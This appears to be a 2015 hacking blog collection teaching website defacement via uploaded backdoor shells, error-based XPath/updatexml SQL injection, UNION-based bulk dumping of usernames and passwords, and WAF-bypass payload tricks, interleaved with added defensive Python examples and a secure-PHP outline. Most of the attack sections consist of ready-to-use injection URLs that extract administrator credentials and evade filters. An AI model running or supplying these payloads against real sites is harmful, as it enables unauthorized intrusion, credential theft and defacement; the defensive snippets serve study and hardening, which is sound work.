Wednesday, March 18, 2015

How to Inject, Upload a Shell and Deface a Website

Website defacement is an attack on a website that changes the visual appearance of the site or a web page. These are typically the work of system crackers who break into a web server and replace the hosted website with one of their own. Defacement is generally meant as a kind of electronic graffiti, although recently it has become a means to spread messages by politically motivated "cyber protesters" or hacktivists.
The most common method of defacement is SQL injection that yields administrative access. Another method of defacement is FTP, once a username and password have been obtained.
Defacements usually consist of an entire page. This page usually includes the defacer's pseudonym or "hacking codename". Sometimes the defacer makes fun of the system administrator for failing to maintain server security. Most of the time the defacement is harmless and is only done to show off a system cracker's skills or for hacktivism; however, it can sometimes be used as a distraction to cover up more sinister actions such as uploading malware or deleting essential files from the server.

A backdoor shell is a malicious piece of code (e.g. PHP, Python, Ruby) that can be uploaded to a site to gain access to the files stored on that site. Once it is uploaded, the hacker can use it to edit, delete or download any files on the site, or upload their own.

How to upload a shell
Hackers usually take advantage of an upload panel designed for uploading images onto sites. This is usually found once the hacker has logged in as the admin of the site. Shells can also be uploaded via exploits or remote file inclusion.

To deface a website we need the following things:
  1. Vulnerable site
  2. admin panel | or | Full path
  3. Shell like C99.php
  4. Mind
  5. Defacing Page




Friday, March 6, 2015

Error Based Xpath Injection Tutorial

Similar to SQL injection, XPath injection attacks occur when a web site uses user-supplied information to construct an XPath query for XML data. By sending intentionally malformed information to the web site, an attacker can find out how the XML data is structured, or access data that he may not normally have access to. He may even be able to elevate his privileges on the web site if the XML data is being used for authentication (such as an XML-based user file).
Querying XML is done with XPath, a type of simple descriptive statement that allows the XML query to locate a piece of information. Like SQL, you can specify certain attributes to find and patterns to match. When using XML for a web site it is common to accept some form of input on the query string to identify the content to locate and display on the page. This input must be sanitized to verify that it doesn't alter the XPath query and return the wrong data.
XPath is a standard language; its notation and syntax are implementation independent, which means the attack may be automated. There are no different dialects, as there are among SQL databases.
Because XPath has no access-level control, it is possible to retrieve the entire document. We won't encounter the limitations we may know from SQL injection attacks.


Example Vulnerability

We'll use this XML snippet for the examples.
<?xml version="1.0" encoding="utf-8"?>
<Employees>
  <Employee ID="1">
    <FirstName>Arnold</FirstName>
    <LastName>Baker</LastName>
    <UserName>ABaker</UserName>
    <Password>SoSecret</Password>
    <Type>Admin</Type>
  </Employee>
  <Employee ID="2">
    <FirstName>Peter</FirstName>
    <LastName>Pan</LastName>
    <UserName>PPan</UserName>
    <Password>NotTelling</Password>
    <Type>User</Type>
  </Employee>
</Employees>
Suppose we have a user authentication system on a web page that uses a data file of this sort to log in users. Once a username and password have been supplied, the software might use XPath to look up the user (XPath keywords are case-sensitive, so the operator is spelled "and"):
VB:
Dim FindUserXPath As String
FindUserXPath = "//Employee[UserName/text()='" & Request("Username") & "' and Password/text()='" & Request("Password") & "']"
C#:
String FindUserXPath;
FindUserXPath = "//Employee[UserName/text()='" + Request("Username") + "' and Password/text()='" + Request("Password") + "']";
With a normal username and password this XPath works, but an attacker may send a crafted username and password and get an XML node selected without knowing a valid username or password, like this:
Username: blah' or 1=1 or 'a'='a
Password: blah
FindUserXPath becomes:
//Employee[UserName/text()='blah' or 1=1 or 'a'='a' and Password/text()='blah']
Because "and" binds more tightly than "or" in XPath, this is logically equivalent to:
//Employee[(UserName/text()='blah' or 1=1) or ('a'='a' and Password/text()='blah')]
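As an added example (not from the original post), here is the same lookup in Python: build_xpath_unsafe reproduces the VB/C# string concatenation so the injected expression can be inspected, and find_user is a hardened lookup that never interpolates input into an XPath expression at all; it checks the username against an allow-list and then compares values in code. The document is the Employees XML from above; the function names and the allow-list pattern are my own assumptions.

```python
import hmac
import re
import xml.etree.ElementTree as ET

# Constructed sample data: the Employees document shown above.
EMPLOYEES_XML = """<Employees>
  <Employee ID="1">
    <FirstName>Arnold</FirstName><LastName>Baker</LastName>
    <UserName>ABaker</UserName><Password>SoSecret</Password><Type>Admin</Type>
  </Employee>
  <Employee ID="2">
    <FirstName>Peter</FirstName><LastName>Pan</LastName>
    <UserName>PPan</UserName><Password>NotTelling</Password><Type>User</Type>
  </Employee>
</Employees>"""


def build_xpath_unsafe(username, password):
    """The VB/C# concatenation from the post, reproduced so the expression
    an XPath engine would receive can be inspected. It is never evaluated
    here; quotes in the input simply become part of the predicate."""
    return ("//Employee[UserName/text()='" + username
            + "' and Password/text()='" + password + "']")


# Allow-list for usernames (an assumption for this demo): letters, digits,
# dot, underscore and dash only, so no quote or bracket can reach a query.
USERNAME_RE = re.compile(r"[A-Za-z0-9._-]{1,64}")


def find_user(xml_text, username, password):
    """Hardened lookup. Returns the Employee ID attribute on success, None
    otherwise. No expression is built from input: the username is checked
    against the allow-list and then compared in code, element by element."""
    if not USERNAME_RE.fullmatch(username):
        return None
    root = ET.fromstring(xml_text)
    for emp in root.iter("Employee"):
        if emp.findtext("UserName") != username:
            continue
        stored = emp.findtext("Password") or ""
        # Constant-time comparison. The sample stores plaintext passwords;
        # a real deployment would store and compare a password hash instead.
        if hmac.compare_digest(stored.encode(), password.encode()):
            return emp.get("ID")
        return None
    return None


if __name__ == "__main__":
    payload_user, payload_pass = "blah' or 1=1 or 'a'='a", "blah"
    print(build_xpath_unsafe(payload_user, payload_pass))
    print(find_user(EMPLOYEES_XML, "ABaker", "SoSecret"))        # 1
    print(find_user(EMPLOYEES_XML, payload_user, payload_pass))  # None
```

The allow-list rejects the post's payload before any document access, and even a payload that passed it could only ever be compared as an opaque string, which is the property a query built by concatenation lacks.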

Techniques and Queries of XPath Injection

The payloads below are error-based MySQL injection through the updatexml() function: updatexml() evaluates its second argument as an XPath expression, and the leading 0x3a (a colon) makes that expression invalid, so MySQL raises an "XPATH syntax error" whose message echoes the result of the inner query.
www.vuln-web.com/index.php?view=-35" and updatexml(null,concat(0x3a,(OUR QUERY HERE)),null)--





Queries !!! :p



  • http://vulnerable-site/home.php?selected_blog_id=18+and+updatexml
  • http://vulnerable-site/home.php?selected_blog_id=18+and+updatexml(null,concat(0x3a,version()),null)--+
  • http://vulnerable-site/home.php?selected_blog_id=18+and+updatexml(null,concat(0x3a,user()),null)--+
  • http://vulnerable-site/home.php?selected_blog_id=18+and+updatexml(null,concat(0x3a,database()),null)--+
  • http://vulnerable-site/home.php?selected_blog_id=18+and+updatexml(null,concat(0x3a,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit%200,1)),null)--+
  • http://vulnerable-site/home.php?selected_blog_id=18+and+updatexml(null,concat(0x3a,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit%201,1)),null)--+
  • http://vulnerable-site/home.php?selected_blog_id=18+and+updatexml(null,concat(0x3a,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit%202,1)),null)--+
  • Just increase the LIMIT offset one by one to get the tables.
  • http://vulnerable-site/home.php?selected_blog_id=18+and+updatexml(null,concat(0x3a,(select+column_name+from+information_schema.columns+where+table_name=%27administrator%27+limit%200,1)),null)--+
  • http://vulnerable-site/home.php?selected_blog_id=18+and+updatexml(null,concat(0x3a,(select+column_name+from+information_schema.columns+where+table_name=%27administrator%27+limit%201,1)),null)--+
  • http://vulnerable-site/home.php?selected_blog_id=18+and+updatexml(null,concat(0x3a,(select+column_name+from+information_schema.columns+where+table_name=%27administrator%27+limit%202,1)),null)--+
  • Increase the LIMIT offset one by one to get the columns of the administrator table.
  • http://vulnerable-site/home.php?selected_blog_id=18+and+updatexml(null,concat(0x3a,(select+admin_email+from+administrator)),null)--+
  • http://vulnerable-site/home.php?selected_blog_id=18+and+updatexml(null,concat(0x3a,(select+admin_password+from+administrator)),null)--+



Thursday, March 5, 2015

Death Row (Single Row) Injection


What is Death Row?
While injecting a web application you will usually face this scenario: the whole result set of the query does not get printed; the web application prints only the first row.






For Example:

The query "Select username,password from users;" will output the complete list of users, but it depends on how the web application displays its output. In roughly 70% of cases you will have to face "Death Row Injection".

To overcome this situation we use LIMIT, or, if we are clever enough, we build a condition that outputs only the data we actually need. Here we will discuss both ways.
Let us first understand the internal queries.


Select username from users;


This will output all the usernames, but our target web application outputs only one. So in order to iterate through the rows we will use LIMIT.

Syntax: LIMIT "from row number", "number of rows"

I hope it is clear that the first parameter is the (zero-based) row number from which you want to start, and the second one is the number of rows you want to output.

Now let us try it with the above Query

SELECT username FROM users LIMIT 0,1;


Example from the injection Point of view

www.vuln-site.com/index.php?view=43


If you have read the basic injection tutorial, I don't need to tell you how to trigger the error, comment out the rest of the query and find the number of columns. After doing all that, let us assume the injection is:

www.vuln-site.com/index.php?view=-43 union select 1,2,3,4,5--



As you can see, there is no single quote after 43, which means I am injecting into an integer input query. So now let us try to get the usernames and passwords using the above query.

www.vuln-site.com/index.php?view=43 union select 1,2,concat(username,0x3a,password),4,5 from users--



The above query would output all rows at once, but the web application may return just one. So to get all of them with LIMIT we go one by one.

First row: www.vuln-site.com/index.php?view=43 union select 1,2,concat(username,0x3a,password),4,5 from users limit 0,1--
Second row: www.vuln-site.com/index.php?view=43 union select 1,2,concat(username,0x3a,password),4,5 from users limit 1,1--
Nth row: www.vuln-site.com/index.php?view=43 union select 1,2,concat(username,0x3a,password),4,5 from users limit n,1--


So now we can keep increasing the first parameter to get each row one by one. But if the database is huge, it is a headache to go on like this, and a lazy guy like me will never like to go through this torture. So there is another way to handle the situation.

We can use a subquery to extract a particular number of rows from the database and then concatenate them into the output. Here is an example:

Query:

select group_concat(username,0x3a,password,0x0a)from(select username,password from users limit 0,100);



The above query concatenates 100 rows into the output. Let's see how the injection looks.

First 100 rows: www.vuln-site.com/index.php?view=43 union select 1,2,group_concat(username,0x3a,password),4,5 from (select username,password from users limit 0,100)a--
100 rows from the 100th row: www.vuln-site.com/index.php?view=43 union select 1,2,group_concat(username,0x3a,password),4,5 from (select username,password from users limit 100,100)a--
100 rows from the nth row: www.vuln-site.com/index.php?view=43 union select 1,2,group_concat(username,0x3a,password),4,5 from (select username,password from users limit n,100)a--


In this way we can speed up the process. But if we think of a database containing hundreds of thousands of rows, it again becomes a headache. One might think of increasing the number of rows fetched per injection to speed things up, but there is a problem: GROUP_CONCAT has a default limit of 1024 characters (the group_concat_max_len setting) and truncates the rest. So there is another way out: we can use the CAST function to increase the buffer.

Query:

SELECT CAST(GROUP_CONCAT(username,0x3a,password,0x0a) AS CHAR(2048)) FROM users;


I have increased the buffer to 2048; you can try increasing it further, for example to 8192, but not beyond that, as you know that is the default limit of a POST output. So what if you can't get everything at once? We can again use the subquery trick.



SELECT CAST(GROUP_CONCAT(username,0x3a,password,0x0a) AS CHAR(2048)) FROM (SELECT username,password FROM users LIMIT 0,2000)a;



Now the process is fast enough. Let us check our injection.

First 2000 rows: www.vuln-site.com/index.php?view=43 union SELECT 1,2,CAST(GROUP_CONCAT(username,0x3a,password,0x0a) AS CHAR(2048)),4,5 FROM (SELECT username,password FROM users LIMIT 0,2000)a--
2000 rows from the 2000th row: www.vuln-site.com/index.php?view=43 union SELECT 1,2,CAST(GROUP_CONCAT(username,0x3a,password,0x0a) AS CHAR(2048)),4,5 FROM (SELECT username,password FROM users LIMIT 2000,2000)a--
2000 rows from the nth row: www.vuln-site.com/index.php?view=43 union SELECT 1,2,CAST(GROUP_CONCAT(username,0x3a,password,0x0a) AS CHAR(2048)),4,5 FROM (SELECT username,password FROM users LIMIT n,2000)a--
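As an added example (not from the original post), here is the integer "view" parameter from the URLs above handled two ways against a small SQLite database built inside the script: the concatenated query the post injects into, and a parameterized query with an integer check. The table layout, column names and sample rows are assumptions mirroring the post; GROUP_CONCAT and CAST details differ between SQLite and MySQL, so only the single-row LIMIT 0,1 form is replayed, with SQLite's "||" in place of concat(username,0x3a,password).

```python
import sqlite3


def make_db():
    """Constructed in-memory database standing in for the post's target.
    Table and column names are assumptions for this demo."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE posts(id INTEGER PRIMARY KEY, c1 TEXT, c2 TEXT,
                           body TEXT, c4 TEXT, c5 TEXT);
        INSERT INTO posts VALUES (43, 'a', 'b', 'hello world', 'd', 'e');
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 'pw1'), ('bob', 'pw2');
    """)
    return con


def fetch_view_unsafe(con, view):
    """The pattern the post injects into: the 'view' value is pasted into
    the SQL text. Only the first row's body is returned, like a page that
    prints a single row (the post's "death row" situation)."""
    row = con.execute(
        "SELECT id, c1, body, c4, c5 FROM posts WHERE id = " + view).fetchone()
    return row[2] if row else None


def fetch_view_safe(con, view):
    """Hardened version: the value must parse as an integer and is passed
    as a bound parameter, so it can never change the statement's structure."""
    try:
        view_id = int(view)
    except (TypeError, ValueError):
        return None
    row = con.execute(
        "SELECT id, c1, body, c4, c5 FROM posts WHERE id = ?", (view_id,)).fetchone()
    return row[2] if row else None


# The post's single-row payload in SQLite syntax; constructed for this demo.
PAYLOAD = ("-43 union select 1,2,username || ':' || password,4,5 "
           "from users limit 0,1--")


if __name__ == "__main__":
    con = make_db()
    print(fetch_view_unsafe(con, "43"))     # hello world
    print(fetch_view_unsafe(con, PAYLOAD))  # one username:password pair leaks
    print(fetch_view_safe(con, PAYLOAD))    # None: rejected before any query runs
```

The point of the integer check is that everything in this section depends on the attacker appending text after a bare number; once the value is bound as a parameter, LIMIT, GROUP_CONCAT and CAST tricks have nowhere to attach.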



Author : Zenodermus Javanicus

Waf bypass And Show/Dump All Database At One Shot Trick 2015



Today I am going to show you how to bypass Web Application Firewalls (WAF).

Let's Begin!

How to know if there is a Web Application Firewall?

This is pretty simple! When you try to enter a command used for SQL injection (usually "UNION SELECT"), you get a 403 error (and the website says "Forbidden" or "Not Acceptable").

Example:
Code:
http://www.site.com/index.php?page_id=-15 UNION SELECT 1,2,3,4....
(We get a 403 Error!)


Basic/Simple Methods:

First, of course, we need to know the Basic Methods to bypass WAF...

1) Comments:
You can use comments to bypass WAF:

Code:
http://www.site.com/index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4....
(First Method that can Bypass WAF)


However, most WAFs identify this method, so they still show a "Forbidden" error...

2) Change the Case of the Letters:
You can also change the Case of the Command:

Code:
http://www.site.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4....
(Another Basic Method to Bypass WAF!)


However, as before, this trick is also detected by most WAFs!

3) Combine the previous Methods:

What you can also do is to combine the previous two methods:

Code:
http://www.site.com/index.php?page_id=-15 /*!uNIOn*/ /*!SelECt*/ 1,2,3,4....
This method is not detectable by many Web Application Firewalls!

4) Replaced Keywords:

Some firewalls remove the "UNION SELECT" statement when it is found in the URL... We can exploit this removal like this:

Code:
http://www.site.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4....
(The "union" and the "select" will be removed, so the final result will be: "UNION SELECT" :-D )
This method doesn't work on ALL Firewalls, as only some of them remove the "UNION" and the "SELECT" commands when they are detected!

5) Inline Comments (Thanks to Crysan):
Some firewalls get bypassed by Inserting Inline Comments between the "Union" and the "Select" Commands:
Code:
http://www.site.com/index.php?page_id=-15 UnION/**/SElecT 1,2,3,4...
(The U is equal to "U" and S to "S". See more on the Advanced Section....)

I believe these are the most basic methods of WAF bypassing! Let's move on to more advanced ones...


Advanced Methods:

Now that you have learned about Basic WAF Bypassing, I think it is good to understand more advanced Methods!

1) Buffer Overflow / Firewall Crash:
Many firewalls are developed in C/C++ and we can crash them using a buffer overflow!

Code:
http://www.site.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4....

You can test whether the WAF can be crashed by typing:
?page_id=null
/**//*!50000UnIOn*//*yoyu*/all/**/
/*!SeLEct*/
/*nnaa*/+1,2,3,4....

If you get a 500, you can exploit it using the Buffer Overflow method! (Thanks to Crysan for the test.)


2) Replace Characters with their HEX Values (Thanks to Crysan!):
We can replace some characters with their HEX (URL-Encoded) Values.

Example:
Code:
http://www.site.com/index.php?page_id=-15 /*!union*/ /*!select*/ 1,2,3,4....
(which means "union select")
Text to Hex Encoder (Choose the "Hex Encoded for URL" result!): http://www.swingnote.com/tools/texttohex.php

3) Use other Variables or Commands instead of the common ones for SQLi:
Apart from "UNION SELECT", other commands might be blocked.
Common commands blocked:

Code:
COMMAND          | WHAT TO USE INSTEAD
-----------------+---------------------
@@version        | version()
concat()         | concat_ws()   (difference between concat() and concat_ws(): http://is.gd/VEeiDU)
group_concat()   | concat_ws()

[!]-> You can also try to SQL Inject with the NAME_CONST Method: http://is.gd/o10i0d (Created by Downfall)
Learning MySQL Really helps on such issues! ;-)

4) Misc Exploitable Functions:
Many firewalls try to offer more protection by adding prototype or strange functions (which, of course, we can exploit!):
Example:
The firewall below replaces "*" (asterisks) with whitespace! What we can do is this:

Code:
http://www.site.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4...
(If the Firewall removes the "*", the result will be: 15+union+select....)



So, if you find such a silly function, you can exploit it in this way! :-D

[+] In addition to the previous example, some other bypasses might be:

Code:
-15+(uNioN)+(sElECt)....

-15+(uNioN+SeleCT)+...

-15+(UnI)(oN)+(SeL)(ecT)+....

-15+union (select 1,2,3,4...)
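As an added example (not from the original post), here is the request-normalization step a detector should run before keyword matching, checked against the evasion payloads listed in this post, together with a demonstration of why a WAF must block rather than strip keywords and forward the request (the weakness behind method 4 above). The sample values are constructed from the post's payloads; the function names and regular expressions are my own.

```python
import re
from urllib.parse import unquote_plus


def normalize(raw):
    """Canonicalize a query-string value before matching it.
    Steps: URL-decode until stable (bounded), keep the body of MySQL
    /*!...*/ version comments (MySQL executes it), replace ordinary
    /*...*/ comments with a space, then fold case and collapse whitespace."""
    text = raw
    for _ in range(3):                      # bounded: defeats double-encoding
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    # /*!50000UnIOn*/ -> " UnIOn ": the server runs the comment body, so must we
    text = re.sub(r"/\*!\d*\s*(.*?)\*/", r" \1 ", text, flags=re.S)
    # /**/ and /*yoyu*/ are pure whitespace to MySQL
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)
    return re.sub(r"\s+", " ", text).strip().lower()


# "union" and "select" as separate words, optionally parenthesized,
# optionally with ALL/DISTINCT in between.
UNION_SELECT = re.compile(
    r"\(?\s*\bunion\b\s*\)?\s*(?:(?:all|distinct)\s+)?\(?\s*\bselect\b")


def looks_like_union_select(raw):
    """True when the normalized value contains a UNION ... SELECT."""
    return UNION_SELECT.search(normalize(raw)) is not None


def naive_keyword_removal(raw):
    """The anti-pattern exploited in method 4: delete each occurrence of
    union/select once and forward the rest. Included only to show that
    rewriting input recreates the keywords; a WAF should reject, not rewrite."""
    return re.sub(r"union|select", "", raw, flags=re.I)


# Constructed sample values, following the payload shapes in this post.
SAMPLES = [
    "-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4",
    "-15 uNIoN sELecT 1,2,3,4",
    "-15 /*!uNIOn*/ /*!SelECt*/ 1,2,3,4",
    "-15 UnION/**/SElecT 1,2,3,4",
    "null/**//*!50000UnIOn*//*yoyu*/all/**//*!SeLEct*//*nnaa*/+1,2,3,4",
    "-15+(uNioN)+(sElECt)+1,2,3,4",
    "-15+(uNioN+SeleCT)+1,2,3,4",
    "-15+union (select 1,2,3,4)",
    "-15+%2F%2A%21union%2A%2F+%2F%2A%21select%2A%2F+1,2,3,4",  # URL-encoded comments
]


def flagged_samples():
    """The constructed samples the detector flags (expected: all of them)."""
    return [s for s in SAMPLES if looks_like_union_select(s)]


if __name__ == "__main__":
    for s in SAMPLES:
        print(looks_like_union_select(s), normalize(s))
    rewritten = naive_keyword_removal("UNIunionON SELselectECT 1,2,3,4")
    print(rewritten, looks_like_union_select(rewritten))  # UNION SELECT ... True
```

Two design points follow from the post's list: the normalized copy is used only to decide, and the original request is what gets forwarded or dropped; and the version-comment rule must run before the generic comment rule, otherwise the keyword inside /*!...*/ is discarded exactly as the firewalls described above discard it.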

Only FOR educational Purpose



Wednesday, March 4, 2015

Writing Secure Php




In this course we will cover the following topics.



Topics of the course

What is the threat?

  • How can you analyze the threat?
  • What types of threats are out there?
  • How bad is it?
  • What threats are specific to PHP?
  • What are some resources to find out more?


What are the consequences when a website is not protected against attack?
  • Financial loss
  • Loss of service
  • Identity theft
  • Website infection


What are the most common forms of attack?

  • Cross-site scripting (XSS)
  • Remote code injection
  • Session hijacking, fixation, and request forgery
  • SQL injection

What are the most common vulnerabilities attackers can exploit?

  • Unplanned information disclosure
  • Predictable resource location
  • Insufficient authorization
  • Improper access controls
  • PHP misconfiguration
  • Mishandling of file uploads

         